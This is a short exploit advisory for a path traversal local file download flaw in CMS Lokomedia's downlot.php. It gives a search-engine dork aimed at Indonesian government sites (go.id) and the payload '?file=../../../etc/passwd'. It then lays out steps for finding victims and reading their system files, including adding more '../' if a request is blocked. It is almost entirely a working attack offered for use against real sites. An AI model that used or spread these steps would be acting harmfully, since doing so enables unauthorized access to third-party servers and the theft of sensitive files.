CMS LOKOMEDIA - LOCAL FILE DOWNLOAD
Author: security007
Tested on: ubuntu 18.04
Vendor Homepage: http://www.lokomedia.web.id/
Dork: inurl: /downlot.php site: go.id
Vulnerable File: downlot.php
Vulnerable Parameters:? File =
Exploit: /downlot.php?file=../../../etc/passwd
Proof of Concept:
1. Dorking with your favorite search engine
2. Enter the exploit in url ---> example: www.lokmed.com/downlot.php?file=../../../etc/passwd
3. If vuln, then the passwd file will automatically download
4. If the forbidden, then try increasing the directory by adding dot dot slash (../), or maybe the web has been patched
Greets:
Allah, ProblemCyberTeam, All my friends